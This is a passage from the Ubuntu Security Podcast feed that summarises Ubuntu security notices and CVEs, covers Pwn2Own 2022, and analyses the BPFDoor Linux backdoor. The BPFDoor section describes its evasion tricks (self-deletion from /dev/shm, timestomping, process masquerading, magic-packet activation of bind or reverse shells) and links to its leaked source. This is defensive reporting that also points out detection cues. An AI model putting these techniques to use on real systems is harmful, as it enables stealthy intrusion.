<h3 id="usn-5439-1-accountsservice-vulnerability-05-06">[<a href="https://ubuntu.com/security/notices/USN-5439-1">USN-5439-1</a>] AccountsService vulnerability [05:06]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1804">CVE-2022-1804</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Old CVE-2020-16126 was inadvertently reintroduced as the patch which
fixed it got dropped accidentally
<ul>
<li><a href="https://ubuntusecuritypodcast.org/episode-95/">Episode 95</a></li>
</ul>
</li>
</ul>
<h3 id="usn-5440-1-postgresql-vulnerability-05-36">[<a href="https://ubuntu.com/security/notices/USN-5440-1">USN-5440-1</a>] PostgreSQL vulnerability [05:36]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1552">CVE-2022-1552</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible for an attacker who is able to create non-temp objects could
then achieve SQL code execution as the superuser</li>
</ul>
<h3 id="usn-5404-2-rsyslog-vulnerability-05-51">[<a href="https://ubuntu.com/security/notices/USN-5404-2">USN-5404-2</a>] Rsyslog vulnerability [05:51]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24903">CVE-2022-24903</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-159/">Episode 159</a></li>
</ul>
<h2 id="goings-on-in-linux-security-community">Goings on in Linux Security Community</h2>
<h3 id="bpfdoor-malware-targeting-linux-and-solaris-06-08">BPFDoor malware targeting Linux and Solaris [06:08]</h3>
<ul>
<li>
<p><a href="https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf">https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf</a></p>
</li>
<li>
<p><a href="https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896">https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896</a></p>
</li>
<li>
<p><a href="https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/">https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/</a></p>
</li>
<li>
<p>Malware that has been in the wild for a while (over 5 years)</p>
</li>
<li>
<p>Reported on by PwC in their Cyber Threats 2021: A year in Retrospect report</p>
<ul>
<li>Attribute it to a Chinese threat actor which they call Red Menshen</li>
<li>Observed targeting telco providers and govt, education and logistics
via custom backdoor &lsquo;BPFDoor&rsquo;</li>
</ul>
</li>
<li>
<p>Stealthy - allows to backdoor a system for RCE but without opening any
new network ports or firewall rules by piggy-backing on existing network
facing applications</p>
</li>
<li>
<p>Uses BPF filter to watching incoming packets and activate accordingly</p>
</li>
<li>
<p><a href="https://www.virustotal.com/gui/file/dc8346bf443b7b453f062740d8ae8d8d7ce879672810f4296158f90359dcae3a/detection/f-dc8346bf443b7b453f062740d8ae8d8d7ce879672810f4296158f90359dcae3a-1567566897">Earlier</a> versions are on VT - with <a href="https://www.virustotal.com/gui/collection/dd82ee900dd15a5d6205d7aeb8a0c9d60e1b3c93c678cfd7a8fa7be444afefe7/iocs">lots</a> of other variants too</p>
</li>
<li>
<p>Even <a href="https://www.virustotal.com/gui/file/8b9db0bc9152628bdacc32dab01590211bee9f27d58e0f66f6a1e26aea7552a6/detection">source code</a> too - <a href="https://pastebin.com/kmmJuuQP">https://pastebin.com/kmmJuuQP</a></p>
</li>
<li>
<p>As I said - stealthy</p>
<ul>
<li>deletes itself from the filesystem and renames its processes to look
innocent so can hide in plain sight</li>
<li>loads BPF filter to sniff traffic</li>
<li>upon activation then will modify firewall to allow attacker direct
access</li>
</ul>
</li>
<li>
<p>In more detail:</p>
<ul>
<li>Copies itself to <code>/dev/shm/kdmtmpflush</code> and then forks to clean itself up
to alter timestamps (timestomp) to a specific timestamp (7:17pm
Thursday October 30th 2008)</li>
<li>Drops a file at <code>/bar/run/haldrund.pid</code> to prevent further copies of
itself from running</li>
<li>Deletes itself from the <code>/dev/shm/</code> ramdisk and then exits to leave the
forked copy running resident in memory and then use BPF filter to watch
for incoming traffic to activate</li>
</ul>
</li>
<li>
<p>Doesn&rsquo;t appear to have any particular persistence mechanism but some
reports suggest use of <code>crontab</code> or <code>rc/init</code> scripts</p>
</li>
<li>
<p>By deleting itself from the ramdisk this avoids detection from filesystem
scanners (although processes running from since deleted binaries are a
suspicious sign themselves and can be easily detected since once the
binary is removed the kernel notes this in <code>/proc/self/exe</code> for the
process)</p>
</li>
<li>
<p>Renames its <code>argv[0]</code> so that it looks like other commonly found processes
like <code>dbus-daemon</code> / <code>udevd</code> / <code>auditd</code> etc</p>
</li>
<li>
<p>Also wipes its <code>environ</code> too to try and help hide it&rsquo;s activities, however
this again is another suspicious activity and can easily be detected
(e.g. <code>strings</code> on <code>/proc/$PID/environ</code> will show as empty which is basically
never normally the case for normal processes)</p>
</li>
<li>
<p>BPF filter inspects either ICMP, TCP or UDP packets and then if it has a
special magic value in the first couple bytes it passes into the main
packet processing routine</p>
<ul>
<li>This then looks for a couple specific passwords (encrypted via RC4) -
if found then sets up either a local bindshell for the attacker to
connect to OR connects back to the attacker via a reverse bindshell</li>
<li>Then sets up an iptables rule to redirect traffic from the original
port to the port of the bindshell on the localhost</li>
</ul>
</li>
<li>
<p>bindshell masquerades its process name to look like postfix as well as
setting a specific environment too (including <code>HISTFILE=/dev/null</code>)</p>
</li>
<li>
<p>Then attacker has full access to the machine (as the user)</p>
</li>
<li>
<p>Reasonably advanced malware</p>
</li>
<li>
<p>What is not clear is what is the initial compromise vector and then how
to privesc from that to give privileges to load BPF filter on a raw socket</p>
<ul>
<li><a href="https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/">Crowdstrike blog post mentions</a> that on Solaris <a href="https://ubuntu.com/security/CVE-2019-3010">CVE-2019-3010</a> is used to
privesc via <code>xscreensaver</code> but this vuln is specific to Solaris platforms</li>
</ul>
</li>
<li>
<p>Why it is important to keep systems updated with latest patches etc.</p>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E161.mp3" length="11475952" type="audio/mpeg" /><itunes:duration>880</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 160
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-160/</link>
          <pubDate>Fri, 20 May 2022 17:36:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>a470f94e6aa84e5bf8a94b58deeafe0f2de26aa17edb07c480075e25398f91bf9b072bc849307b94eaa8a82373c1d99cafc515ebff380efa7a304ad8c0f0846d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 160</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu get's pwned again at Pwn2Own Vancouver 2022, plus we look at
  security updates for the Linux kernel, RSyslog, ClamAV, Apport and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu get's pwned again at Pwn2Own Vancouver 2022, plus we look at
  security updates for the Linux kernel, RSyslog, ClamAV, Apport and more.
  </itunes:summary>
        <description>  Ubuntu get's pwned again at Pwn2Own Vancouver 2022, plus we look at
  security updates for the Linux kernel, RSyslog, ClamAV, Apport and more.
  </description>
        <googleplay:description>  Ubuntu get's pwned again at Pwn2Own Vancouver 2022, plus we look at
  security updates for the Linux kernel, RSyslog, ClamAV, Apport and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu get&rsquo;s pwned again at Pwn2Own Vancouver 2022, plus we look at
security updates for the Linux kernel, RSyslog, ClamAV, Apport and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>57 unique CVEs addressed</p>
<h3 id="usn-5413-1-linux-kernel-vulnerabilities-01-06">[<a href="https://ubuntu.com/security/notices/USN-5413-1">USN-5413-1</a>] Linux kernel vulnerabilities [01:06]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28390">CVE-2022-28390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27223">CVE-2022-27223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26490">CVE-2022-26490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4157">CVE-2021-4157</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39713">CVE-2021-39713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27820">CVE-2020-27820</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 - 16.04 ESM GA + 14.04 ESM</li>
<li>UAF in nouveau driver when device is removed - external NVIDIA GPU? or
local user unbinding the driver?</li>
<li>UAF due to race condition in network packet scheduler</li>
<li>OOB write in NFS - user who had access to an NFS mount could possibly
exploit this</li>
<li>Buffer overflow in ST Micro NFC driver - failed to validate parameters
from NFC device - physically approximate attacker could possibly exploit
this but would need custom hw/sw</li>
<li>Similarly, Xilinx USB2 gadget driver failed to validate USB endpoints</li>
<li>ESM CAN/USB double-free</li>
</ul>
<h3 id="usn-5415-1-linux-kernel-vulnerabilities-02-27">[<a href="https://ubuntu.com/security/notices/USN-5415-1">USN-5415-1</a>] Linux kernel vulnerabilities [02:27]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27223">CVE-2022-27223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26490">CVE-2022-26490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25375">CVE-2022-25375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25258">CVE-2022-25258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20008">CVE-2022-20008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1016">CVE-2022-1016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26401">CVE-2021-26401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27820">CVE-2020-27820</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - 20.04 LTS GA + 18.04 LTS HWE + clouds</li>
<li>Above vulns plus:
<ul>
<li>AMD specific issue around insufficient mitigations for Spectre v2
attacks</li>
<li>OOB read -&gt; info leak through mishandling of MMC/SD read errors</li>
</ul>
</li>
</ul>
<h3 id="usn-5417-1-linux-kernel-vulnerabilities-03-07">[<a href="https://ubuntu.com/security/notices/USN-5417-1">USN-5417-1</a>] Linux kernel vulnerabilities [03:07]</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29156">CVE-2022-29156</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27223">CVE-2022-27223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26966">CVE-2022-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26490">CVE-2022-26490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25375">CVE-2022-25375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25258">CVE-2022-25258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20008">CVE-2022-20008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26401">CVE-2021-26401</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 - 21.10, 20.04 LTS HWE + some clouds</li>
<li>~ same as above</li>
</ul>
<h3 id="usn-5418-1-linux-kernel-vulnerabilities-03-19">[<a href="https://ubuntu.com/security/notices/USN-5418-1">USN-5418-1</a>] Linux kernel vulnerabilities [03:19]</h3>
<ul>
<li>13 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27223">CVE-2022-27223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26966">CVE-2022-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26490">CVE-2022-26490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25375">CVE-2022-25375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25258">CVE-2022-25258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24958">CVE-2022-24958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23042">CVE-2022-23042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23040">CVE-2022-23040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23039">CVE-2022-23039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23038">CVE-2022-23038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23037">CVE-2022-23037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23036">CVE-2022-23036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26401">CVE-2021-26401</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 - 18.04 LTS GA, 16.04 ESM HWE + clouds + OEM, 14.04 ESM azure</li>
<li>~ same as above</li>
</ul>
<h3 id="usn-5416-1-linux-kernel--oem--vulnerabilities-03-26">[<a href="https://ubuntu.com/security/notices/USN-5416-1">USN-5416-1</a>] Linux kernel (OEM) vulnerabilities [03:26]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28390">CVE-2022-28390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28389">CVE-2022-28389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1516">CVE-2022-1516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1158">CVE-2022-1158</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.14 - 20.04 LTS OEM</li>
<li>KVM mishandled guest page table updates -&gt; guest VM crash host OS</li>
<li>2 similar issues in CAN bus drivers - 8 Devices USB2CAN and Microchip CAN
Bus analyzer both had double-free on error paths - local attacker could
crash -&gt; DoS</li>
<li>Plus ESM CAN/USB issue from above</li>
</ul>
<h3 id="usn-5419-1-rsyslog-vulnerabilities-04-26">[<a href="https://ubuntu.com/security/notices/USN-5419-1">USN-5419-1</a>] Rsyslog vulnerabilities [04:26]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17042">CVE-2019-17042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17041">CVE-2019-17041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16881">CVE-2018-16881</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in handling of various message types (AIX + Cisco log messages
failed to properly validate contents and so could result in heap buffer overflow)</li>
<li>1 in handling of plain TCP socket comms - but this module is not enabled
in the default rsyslog configuration for Ubuntu</li>
</ul>
<h3 id="usn-5420-1-vorbis-vulnerabilities-05-01">[<a href="https://ubuntu.com/security/notices/USN-5420-1">USN-5420-1</a>] Vorbis vulnerabilities [05:01]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10393">CVE-2018-10393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10392">CVE-2018-10392</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14160">CVE-2017-14160</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>heap buffer overflow, OOB read + stack buffer overflow via crafted input
files - DoS / RCE</li>
</ul>
<h3 id="usn-5421-1-libtiff-vulnerabilities-05-16">[<a href="https://ubuntu.com/security/notices/USN-5421-1">USN-5421-1</a>] LibTIFF vulnerabilities [05:16]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0865">CVE-2022-0865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0891">CVE-2022-0891</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0562">CVE-2022-0562</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0561">CVE-2022-0561</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35522">CVE-2020-35522</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Similar types of issues in libtiff - OOB reads / writes</li>
</ul>
<h3 id="usn-5422-1-libxml2-vulnerabilities-05-32">[<a href="https://ubuntu.com/security/notices/USN-5422-1">USN-5422-1</a>] libxml2 vulnerabilities [05:32]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29824">CVE-2022-29824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23308">CVE-2022-23308</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF plus possible integer overflows -&gt; unspec impact (but requires victim
to process a multiGB XML file)</li>
</ul>
<h3 id="usn-5311-2-containerd-regression-06-03">[<a href="https://ubuntu.com/security/notices/USN-5311-2">USN-5311-2</a>] containerd regression [06:03]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23648">CVE-2022-23648</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-152/">Episode 152</a> - subsequent update to containerd by different team reverted
the CVE fix accidentally - reinstated it</li>
</ul>
<h3 id="usn-5423-1-usn-5423-2-clamav-vulnerabilities-06-24">[<a href="https://ubuntu.com/security/notices/USN-5423-1">USN-5423-1</a>, <a href="https://ubuntu.com/security/notices/USN-5423-2">USN-5423-2</a>] ClamAV vulnerabilities [06:24]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-20796">CVE-2022-20796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20792">CVE-2022-20792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20785">CVE-2022-20785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20771">CVE-2022-20771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20770">CVE-2022-20770</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>0.103.6</li>
<li>Various infinite loops in different parsers (CPU-based DoS), memory leaks
plus a couple OOB writes</li>
</ul>
<h3 id="usn-5424-1-openldap-vulnerability-06-53">[<a href="https://ubuntu.com/security/notices/USN-5424-1">USN-5424-1</a>] OpenLDAP vulnerability [06:53]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29155">CVE-2022-29155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SQL injection in the sql backend of slapd via an SQL statement within a LDAP query</li>
</ul>
<h3 id="usn-5425-1-pcre-vulnerabilities-07-09">[<a href="https://ubuntu.com/security/notices/USN-5425-1">USN-5425-1</a>] PCRE vulnerabilities [07:09]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14155">CVE-2020-14155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20838">CVE-2019-20838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read -&gt; info leak</li>
<li>integer overflow -&gt; buffer overflow? -&gt; crash / code execution</li>
</ul>
<h3 id="usn-5426-1-needrestart-vulnerability-07-20">[<a href="https://ubuntu.com/security/notices/USN-5426-1">USN-5426-1</a>] needrestart vulnerability [07:20]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30688">CVE-2022-30688</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>detects daemons that need to be restarted after libraries are upgraded</li>
<li>uses various regex&rsquo;s to detect scripting languages - but since these were
not specific enough, it could allow a user to get their own script
executed in the context of the user which is running needrestart - which
could be root</li>
</ul>
<h3 id="usn-5427-1-apport-vulnerabilities-08-08">[<a href="https://ubuntu.com/security/notices/USN-5427-1">USN-5427-1</a>] Apport vulnerabilities [08:08]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28658">CVE-2022-28658</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28657">CVE-2022-28657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28656">CVE-2022-28656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28655">CVE-2022-28655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28654">CVE-2022-28654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28652">CVE-2022-28652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1242">CVE-2022-1242</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3899">CVE-2021-3899</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Gerrit Venema reported a heap of issues in Apport - thanks to Marc
Deslauriers on our team for working on these</li>
<li>Crash handler in Ubuntu - is invoked by the kernel when an application
crashes to collect various data to then upload to Ubuntu developers</li>
<li>Runs as root but can be invoked as a regular user so has been a target
for privesc vulns in the past</li>
<li>Has various code to drop privileges etc but these were found to be
incomplete</li>
<li>Impacts of these issues range from DoS by crashing Apport through to
local privesc to root</li>
</ul>
<h3 id="usn-5428-1-libxrandr-vulnerabilities-09-14">[<a href="https://ubuntu.com/security/notices/USN-5428-1">USN-5428-1</a>] libXrandr vulnerabilities [09:14]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-7948">CVE-2016-7948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7947">CVE-2016-7947</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflows -&gt; OOB write plus another different OOB write - all
able to be triggered by a malicious remote X server</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-in-pwn2own-vancouver-2022-09-39">Ubuntu in Pwn2Own Vancouver 2022 [09:39]</h3>
<ul>
<li>15 year anniversary of Pwn2Own</li>
<li>17 teams attempting to exploit 21 targets - including Ubuntu Desktop for EoP</li>
<li><a href="https://www.zerodayinitiative.com/blog/2022/5/17/pwn2own-vancouver-2022-the-schedule">https://www.zerodayinitiative.com/blog/2022/5/17/pwn2own-vancouver-2022-the-schedule</a></li>
<li>5 different teams targeting Ubuntu Desktop - Ubuntu 22.04 LTS fully
up-to-date</li>
<li>Prize of $40k USD</li>
<li>2 on day 1, 2 on day 2, 1 on day 3 (tomorrow)</li>
<li><a href="https://www.zerodayinitiative.com/blog/2022/5/18/pwn2own-vancouver-2022-the-results">https://www.zerodayinitiative.com/blog/2022/5/18/pwn2own-vancouver-2022-the-results</a></li>
<li>So far all 4 have been successful:
<ul>
<li>Team Orca of Sea Security (not live streamed)
<ul>
<li>OOBW + UAF</li>
</ul>
</li>
<li><a href="https://www.youtube.com/watch?v=BF4pZaojrco">Keith Yeo</a>
<ul>
<li>UAF</li>
</ul>
</li>
<li><a href="https://www.youtube.com/watch?v=p7N7SZ2ImrQ">Bien Pham</a>
<ul>
<li>UAF</li>
</ul>
</li>
<li><a href="https://www.youtube.com/watch?v=VUHkthNgICs">Zhenpeng Lin (@Markak_), Yueqi Chen (@Lewis_Chen_), and Xinyu Xing (@xingxinyu) of Team TUTELARY</a>
<ul>
<li>UAF</li>
</ul>
</li>
</ul>
</li>
<li>Lots of great new bugs - expect to hear more about these in the coming weeks</li>
<li>Past episodes covering Ubuntu @ Pwn2Own over previous years <a href="https://ubuntusecuritypodcast.org/episode-111/">Episode 111</a>
and <a href="https://ubuntusecuritypodcast.org/episode-71/">Episode 71</a> - in particular has a great interview with Steve and Marc
from our team who cover what it is like as a vendor</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E160.mp3" length="10675121" type="audio/mpeg" /><itunes:duration>827</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 159
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-159/</link>
          <pubDate>Sun, 15 May 2022 17:31:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>ff91aae365d281753f772bda601156f2df3509650a25570e838b8518c31a1a3e397997a66e8eb30e61f7c6ffa1939d0634f715c8f652be67782557608b096996</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 159</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we bring you part 2 of our look at the new Ubuntu 22.04 LTS
  release and what's in it for security, plus we cover security updates for
  DPDK, OpenSSL, Cron, RSyslog, Curl and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we bring you part 2 of our look at the new Ubuntu 22.04 LTS
  release and what's in it for security, plus we cover security updates for
  DPDK, OpenSSL, Cron, RSyslog, Curl and more.
  </itunes:summary>
        <description>  This week we bring you part 2 of our look at the new Ubuntu 22.04 LTS
  release and what's in it for security, plus we cover security updates for
  DPDK, OpenSSL, Cron, RSyslog, Curl and more.
  </description>
        <googleplay:description>  This week we bring you part 2 of our look at the new Ubuntu 22.04 LTS
  release and what's in it for security, plus we cover security updates for
  DPDK, OpenSSL, Cron, RSyslog, Curl and more.
  </googleplay:description>
